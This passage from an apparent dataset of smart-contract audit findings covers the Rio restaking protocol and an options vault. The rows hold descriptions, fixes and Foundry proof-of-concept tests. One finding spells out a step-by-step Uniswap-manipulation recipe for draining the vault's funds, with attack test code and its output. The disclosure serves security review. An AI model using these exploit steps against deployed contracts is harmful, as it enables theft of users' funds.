skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker receives all of the ETH he withdrew, avoiding the effect of penalties\\n uint256 balanceBefore = address(this).balance;\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n uint256 balanceAfter = address(this).balance;\\n assertEq(balanceAfter - balanceBefore, amountToWithdraw);\\n}\\n```\\n","When RioLRTCoordinator::rebalance() is called and penalties or slashing events happened during the epoch being settled, distribute the correct amount of penalties to all the `LRTTokens` withdrawn in the current epoch, including the ones that requested the withdrawal before the drop.",Stakers can avoid validator penalties and slashing events if there's enough liquidity in the deposit pool.,"```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport 
{RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n" +All operators can have ETH deposits regardless of the cap setted for them leading to miscalculated TVL,medium,"Some operators might not be eligible for using some strategies in the LRT's underlying tokens. However, in default every operator can have ETH deposits which would impact the TVL/Exchange rate of the LRT regardless of they have a cap or not.\\nFirst, let's examine how an operator can have ETH deposit\\nAn operator can have ETH deposits by simply staking in beacon chain, to do so they are not mandatory to call EigenPods ""stake"" function. They can do it separately without calling the EigenPods stake function.\\nAlso, every operator delegator contract can call `verifyWithdrawalCredentials` to increase EigenPod shares and decrease the queued ETH regardless of they are active operator or they have a cap determined for BEACON_CHAIN_STRATEGY.\\nNow, let's look at how the TVL of ETH (BEACON_CHAIN_STRATEGY) is calculated in the AssetRegistry:\\n```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function 
getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n\\nAs we can see above, regardless of the operators' caps, all the operators are looped over.\\n```\\nfunction getEigenPodShares() public view returns (int256) {\\n return eigenPodManager.podOwnerShares(address(this));\\n }\\n\\n function getETHQueuedForWithdrawal() public view returns (uint256) {\\n uint256 ethQueuedSlotData;\\n assembly {\\n ethQueuedSlotData := sload(ethQueuedForUserSettlementGwei.slot)\\n }\\n\\n uint64 userSettlementGwei = uint64(ethQueuedSlotData);\\n uint64 operatorExitAndScrapeGwei = uint64(ethQueuedSlotData >> 64);\\n\\n return (userSettlementGwei + operatorExitAndScrapeGwei).toWei();\\n }\\n\\n function getETHUnderManagement() external view returns (uint256) {\\n int256 aum = getEigenPodShares() + int256(getETHQueuedForWithdrawal());\\n if (aum < 0) return 0;\\n\\n return uint256(aum);\\n }\\n```\\n\\nSince the operator has eigen pod shares, the TVL will account for it as well. However, since the operator is not actively participating in ether deposits (not in the heap order), withdrawals or deposits to this specific operator are impossible. Hence, the TVL is accounting for an operator's eigen pod share which the contract assumes is not in the heap.\\nTextual PoC: Assume there are 5 operators whereas only 4 of these operators are actively participating in BEACON_CHAIN_STRATEGY which means that 1 operator has no validator caps set, hence it is not in the heap order. However, this operator can still have ether deposits and can verify them. 
Since the TVL accounting loops over all the operators rather than only the operators that are actively participating in the beacon chain strategy, the TVL calculated will be wrong.",Put a check on `verifyWithdrawalCredentials` so that it is not possible to call the function if the operator is not actively participating in the BEACON_CHAIN_STRATEGY.,Miscalculation of total ether holdings of an LRT. Withdrawals can fail because the calculated ether does not exist in the heap but the TVL says there is ether to withdraw from the LRT.,"```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n" +`requestWithdrawal` doesn't estimate accurately the available shares for withdrawals,medium,"The `requestWithdrawal` function inaccurately estimates the available shares for withdrawals by including funds stored in the 
deposit pool into the already deposited EigenLayer shares. This can potentially lead to blocking withdrawals or users receiving less funds for their shares.\\nFor a user to withdraw funds from the protocol, they must first request a withdrawal using the `requestWithdrawal` function, which queues the withdrawal in the current epoch by calling `withdrawalQueue().queueWithdrawal`.\\nTo evaluate the available shares for withdrawal, the function converts the protocol asset balance into shares:\\n```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n\\nThe issue arises from the `getTotalBalanceForAsset` function, which returns the sum of the protocol asset funds held, including assets already deposited into EigenLayer and assets still in the deposit pool:\\n```\\nfunction getTotalBalanceForAsset(\\n address asset\\n) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(\\n getAssetStrategy(asset),\\n sharesHeld\\n );\\n\\n return tokensInRio + tokensInEigenLayer;\\n}\\n```\\n\\nThis causes the calculated `availableShares` to differ from the actual shares held by the protocol because the assets still in the deposit pool shouldn't be converted to shares with the current share price (shares/asset) as they were not deposited into EigenLayer yet.\\nDepending on the current shares price, the function might over or under-estimate the available shares in the protocol. 
This can potentially result in allowing more queued withdrawals than the available shares in the protocol, leading to blocking withdrawals later on or users receiving less funds for their shares.",There is no straightforward way to handle this issue as the asset held by the deposit pool can't be converted into shares while they were not deposited into EigenLayer. The code should be reviewed to address this issue.,"The `requestWithdrawal` function inaccurately estimates the available shares for withdrawals, potentially resulting in blocking withdrawals or users receiving less funds for their shares.","```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n" +Slashing penalty is unfairly paid by a subset of users if a deficit is accumulated.,medium,"If a deficit is accumulated in the EigenPodManager due to slashing when ETH is being withdrawn the slashing payment will be taken from the first cohort to complete a withdrawal.\\nA deficit can happen in `podOwnerShares[podOwner]` in the EigenPodManager in the EigenLayer protocol. 
This can happen if validators are slashed when ETH is queued for withdrawal.\\nThe issue is that this deficit will be paid for by the next cohort to complete a withdrawal by calling `settleEpochFromEigenLayer()`.\\nIn the following code we can see how `epochWithdrawals.assetsReceived` is calculated based on the amount received from the `delegationManager.completeQueuedWithdrawal` call\\n```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nthe amount received could be 0 if the deficit is larger than the amount queued for this cohort. 
See following code in `withdrawSharesAsTokens()` EigenPodManager\\n```\\n } else {\\n podOwnerShares[podOwner] += int256(shares);\\n emit PodSharesUpdated(podOwner, int256(shares));\\n return;\\n }\\n```\\n\\nThese users will pay for all slashing penalties instead of it being spread out among all LRT holders.",A potential solution to deal with this is to check if a deficit exists in `settleEpochFromEigenLayer()`. If it exists functionality has to be added that spreads the cost of the penalty fairly among all LRT holders.,"If a deficit is accumulated the first cohort to settle will pay for the entire amount. If they can not cover it fully, they will receive 0 and the following cohort will pay for the rest.","```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. 
We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n" +ETH withdrawers do not earn yield while waiting for a withdrawal,medium,"In the Rio doc we can read the following\\n""Users will continue to earn yield as they wait for their withdrawal request to be processed.""\\nThis is not true for withdrawals in ETH since they will simply receive an equivalent to the `sharesOWed` calculated when requesting a withdrawal.\\nWhen `requestWithdrawal()` is called to withdraw ETH `sharesOwed` is calculated\\n```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n\\nThe total `sharesOwed` in ETH is added to `epcohWithdrawals.assetsReceived` if we settle with `settleCurrentEpoch()` or `settleEpochFromEigenlayer()`\\nBelow are the places where `assetsReceived` is is set and accumulated\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived);\\n```\\n\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived); \\n```\\n\\n```\\nepochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nwhen claiming rewards this is used to calculate users share\\n```\\namountOut = userSummary.sharesOwed.mulDiv(epochWithdrawals.assetsReceived, epochWithdrawals.sharesOwed);\\n```\\n\\nThe portion of staking rewards accumulated during withdrawal that belongs to LRT holders is never accounted for so withdrawing users do not earn any rewards when 
waiting for a withdrawal to be completed.",Account for the accumulated rewards during the withdrawal period that belong to the deposit pool. This can be calculated based on data in DelayedWithdrawalRouter on Eigenlayer.,"Since a portion of the staking reward belongs to the LRT holders and since the docs mention that yield is accumulated while in the queue, it is fair to assume that withdrawing users have a proportional claim to the yield.\\nAs shown above this is not true, users withdrawing in ETH do not earn any rewards when withdrawing.\\nNot all depositors will be able to withdraw their assets/principal for non-ETH assets.\\nCzar102\\nI see. I will leave it a duplicate of #109, as it was, which will not change the reward distribution from the scenario where it was invalidated. cc @nevillehuang\\nThanks for reminding me to remove #177 from the duplicates @0xmonrel.\\nCzar102\\nResult: Medium Has Duplicates\\nConsidering this a Medium since the loss is constrained to the interest during some of the withdrawal time, which is a small part of the deposits.\\nsherlock-admin3\\nEscalations have been resolved successfully!\\nEscalation status:\\n0xmonrel: accepted","```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n"
If the delta hedge amount is negative, this final check will reverse the sign of the delta hedge amount, messing up the hedged assets the protocol has.\\nAs a result, if the price moves significantly before the next delta hedge, protocol might not have enough funds to pay off users due to incorrect hedging. It also allows the user to manipulate underlying uniswap pool, then force the vault to delta hedge large amount at very bad price while trading tiny position of size 1 wei, without paying any fees. Repeating this process, the malicious user can drain/steal all funds from the vault in a very short time.\\nThe final check in calculating delta hedge amount in `FinanceIGDelta.deltaHedgeAmount` is:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe logic is that if due to small computation errors, delta hedge amount (to sell side token) can slightly exceed amount of side tokens the vault has, when in reality it means to just sell all side tokens the vault has, then delta hedge amount should equal to side tokens amount vault has.\\nThe issue here is that only positive delta hedge amount means vault has to sell side tokens, while negative amount means it has to buy side tokens. But the condition compares `abs(tokensToSwap)`, meaning that if the delta hedge amount is negative, but in absolute value very close to side tokens amount the vault has, then the condition will also be true, which will set `tokensToSwap` to a positive amount of side tokens, i.e. will reverse the delta hedge amount from `-sideTokens` to `+sideTokens`.\\nIt's very easy for malicious user to craft such situation. 
For example, if current price is significantly greater than strike price, and there are no other open trades, simply buy IG bull options for 50% of the vault amount. Then buy IG bull options for another 50%. The first trade will force the vault to buy ETH for delta hedge, while the second trade will force the vault to sell the same ETH amount instead of buying it. If there are open trades, it's also easy to calculate the correct proportions of the trades to make `delta hedge amount = -side tokens`.\\nOnce the vault incorrectly hedges after malicious user's trade, there are multiple bad scenarios which will harm the protocol. For example:\\nIf no trade happens for some time and the price increases, the protocol will have no side tokens to hedge, but the bull option buyers will still receive their payoff, leaving vault LPs in a loss, up to a situation when the vault will not have enough funds to even pay the option buyers payoff.\\nMalicious user can abuse the vault's incorrect hedge to directly profit from it. After the trade described above, any trade, even 1 wei trade, will make vault re-hedge with the correct hedge amount, which can be a significant amount. Malicious user can abuse it by manipulating the underlying uniswap pool: 2.1. Buy underlying uniswap pool up to the edge of allowed range (say, +1.8% of current price, average price of ETH bought = +0.9% of current price) 2.2. Provide uniswap liquidity in that narrow range (+1.8%..+2.4%) 2.3. Open/close any position in IG with amount = 1 wei (basically paying no fees) -> this forces the vault to delta hedge (buy) large amount of ETH at inflated price ~+2% of the current price. 2.5. Remove uniswap liquidity. 2.6. Sell back in the uniswap pool. 2.7. During the delta hedge, uniswap position will buy ETH (uniswap liquidity will sell ETH) at the average price of +2.1% of the current price, also receiving pool fees. 
The fees for manipulating the pool and ""closing"" position via providing liquidity will cancel out and overall profit will be: +2.1% - 0.9% = +1.2% of the delta hedge amount.\\nThe strategy can be enchanced to optimize the profitability, but the idea should be clear.","The check should be done only when `tokensToSwap` is positive:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n- if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n+ if (tokensToSwap > 0 && SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n","Malicious user can steal all vault funds, and/or the vault LPs will incur losses higher than uniswap LPs or vault will be unable to payoff the traders due to incorrect hedged amount.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from 
""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n 
ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testIncorrectDeltaHedge() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.09e18, 0.5e18, 0);\\n testBuyOption(1.09e18, 0.5e18, 0);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 1e18, 0);\\n vm.stopPrank();\\n\\n console.log(""premium"", premium);\\n VaultUtils.logState(vault);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(""payoff received"", charliePayoff);\\n 
}\\n\\n VaultUtils.logState(vault);\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*2, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n// rest of code\\n premium 0\\n baseToken balance 2090000000000000000\\n sideToken balance 0\\n// rest of code\\n premium 25585649987654406\\n baseToken balance 1570585649987654474\\n sideToken balance 499999999999999938\\n// rest of code\\n premium 25752512349788475\\n baseToken balance 2141338162337442881\\n sideToken balance 0\\n// rest of code\\n premium 0\\n baseToken balance 1051338162337442949\\n sideToken balance 999999999999999938\\n// rest of code\\n```\\n\\nNotice:\\nFirst trade (amount = 1 wei) settles delta-hedge at current price (1.09): sideToken = 0 because price is just above kB\\n2nd trade (buy ig bull amount = 0.5) causes delta-hedge of buying 0.5 side token\\n3rd trade (buy ig bull amount = 0.5) causes delta-hedge of selling 0.5 side token (instead of buying 0.5)\\nLast trade (amount = 1 wei) causes vault to buy 1 side token for correct delta-hedge (but at 0 fee to user).","```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n" +Position Manager providing the wrong strike when storing user's position data,medium,"When users mint position using `PositionManager`, users can provide strike that want to be used for the trade. 
However, if the provided strike data is not exactly the same with IG's current strike, the minted position's will be permanently stuck inside the PositionManager's contract.\\nWhen `mint` is called inside `PositionManager`, it will calculate the premium, transfer the required base token, and eventually call `dvp.mint`, providing the user's provided information.\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n\\n```\\n /// @inheritdoc IDVP\\n function mint(\\n address recipient,\\n uint256 strike,\\n uint256 
amountUp,\\n uint256 amountDown,\\n uint256 expectedPremium,\\n uint256 maxSlippage,\\n uint256 nftAccessTokenId\\n ) external override returns (uint256 premium_) {\\n strike;\\n _checkNFTAccess(nftAccessTokenId, recipient, amountUp + amountDown);\\n Amount memory amount_ = Amount({up: amountUp, down: amountDown});\\n\\n==> premium_ = _mint(recipient, financeParameters.currentStrike, amount_, expectedPremium, maxSlippage);\\n }\\n```\\n\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId++;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n==> strike: params.strike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp + params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium += premium;\\n position.notionalUp += params.notionalUp;\\n position.notionalDown += params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp + position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp + params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n 
}\\n```\\n\\nPoC\\nAdd the following test to `PositionManagerTest` contract :\\n```\\n function testMintAndBurnFail() public {\\n (uint256 tokenId, ) = initAndMint();\\n bytes4 PositionNotFound = bytes4(keccak256(""PositionNotFound()""));\\n\\n vm.prank(alice);\\n vm.expectRevert(PositionNotFound);\\n pm.sell(\\n IPositionManager.SellParams({\\n tokenId: tokenId,\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n expectedMarketValue: 0,\\n maxSlippage: 0.1e18\\n })\\n );\\n }\\n```\\n\\nModify `initAndMint` function to the following :\\n```\\n function initAndMint() private returns (uint256 tokenId, IG ig) {\\n vm.startPrank(admin);\\n ig = new IG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vault.setAllowedDVP(address(ig));\\n\\n MarketOracle mo = MarketOracle(ap.marketOracle());\\n\\n mo.setDelay(ig.baseToken(), ig.sideToken(), ig.getEpoch().frequency, 0, true);\\n\\n Utils.skipDay(true, vm);\\n ig.rollEpoch();\\n vm.stopPrank();\\n\\n uint256 strike = ig.currentStrike();\\n\\n (uint256 expectedMarketValue, ) = ig.premium(0, 10 ether, 0);\\n TokenUtils.provideApprovedTokens(admin, baseToken, DEFAULT_SENDER, address(pm), expectedMarketValue, vm);\\n // NOTE: somehow, the sender is something else without this prank// rest of code\\n vm.prank(DEFAULT_SENDER);\\n (tokenId, ) = pm.mint(\\n IPositionManager.MintParams({\\n dvpAddr: address(ig),\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n strike: strike + 1,\\n recipient: alice,\\n tokenId: 0,\\n expectedPremium: expectedMarketValue,\\n maxSlippage: 0.1e18,\\n nftAccessTokenId: 0\\n })\\n );\\n 